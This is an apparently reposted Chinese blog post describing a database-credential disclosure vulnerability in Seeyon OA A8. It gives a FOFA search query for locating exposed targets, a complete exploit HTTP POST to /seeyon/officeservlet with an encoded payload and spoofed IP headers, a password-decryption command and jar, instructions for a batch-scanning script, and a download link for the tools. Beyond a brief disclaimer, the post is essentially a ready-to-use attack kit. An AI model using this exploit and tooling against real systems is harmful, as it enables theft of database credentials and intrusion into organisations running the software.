致远OA—A8数据库账号密码读取

admin 2023年8月2日09:52:36评论525 views字数 1369阅读4分33秒阅读模式

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞名称

致远OA—A8数据库账号密码读取

漏洞影响范围

致远A8+全版本存在数据库账号密码读取漏洞

fofa查询

app="致远互联-OA" && product="致远A8"

漏洞位置

利用点为:

/seeyon/officeservlet  接口

致远OA—A8数据库账号密码读取

致远OA—A8数据库账号密码读取致远OA—A8数据库账号密码读取
致远OA—A8数据库账号密码读取

EXP

POST /seeyon/officeservlet HTTP/1.1            Host: xx.xxx.xx.xx:xx            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0            Pragma: no-cache            Cache-Control: no-cache            Upgrade-Insecure-Requests: 1            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7            Accept-Encoding: gzip, deflate            Accept-Language: zh-CN,zh;q=0.9            Cookie: JSESSIONID=98FCAEBB95CCBEB2C7209BEF7EAA7B3E; loginPageURL=            x-forwarded-for: 127.0.0.1            x-originating-ip: 127.0.0.1            x-remote-ip: 127.0.0.1            x-remote-addr: 127.0.0.1            Connection: close            Content-Type: application/x-www-form-urlencoded            Content-Length: 354            

DBSTEP V3.0 285 0 0 RECORDID=wLoi CREATEDATE=wLehP4whzUoiw=66 originalFileId=wLoi needReadFile=yRWZdAS6 originalCreateDate=wLehP4whzUoiw=66 OPTION=LKDxOWOWLlxwVlOW TEMPLATE=qf85qf85qfDfeazQqAzvcRevy1W3eazvNaMUySz3d7TsdRDsyaM3nYli COMMAND=BSTLOlMSOCQwOV66 affairMemberId=wLoi affairMemberName=wLoi

返回数据库类型,用户名,密码,数据库名称等

致远OA—A8数据库账号密码读取

其中数据库密码被加密,需要解密工具进行解密

密码解密

java -jar PassDecode.jar seeyon /1.0/xxxx

致远OA—A8数据库账号密码读取

致远OA—A8数据库账号密码读取致远OA—A8数据库账号密码读取
致远OA—A8数据库账号密码读取

批量检测脚本

致远OA—A8数据库账号密码读取

使用说明

在脚本文件夹下新建txt文档,命名为 致远A8.txt 存放检测目标地址,然后运行脚本即可。


相关工具

链接:https://pan.baidu.com/s/1mXSPK4sWyhtldsZKRW64Zg 提取码:af5w

原文始发于微信公众号(网络安全透视镜):致远OA—A8数据库账号密码读取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月2日09:52:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   致远OA—A8数据库账号密码读取http://cn-sec.com/archives/1927673.html

发表评论

匿名网友 填写信息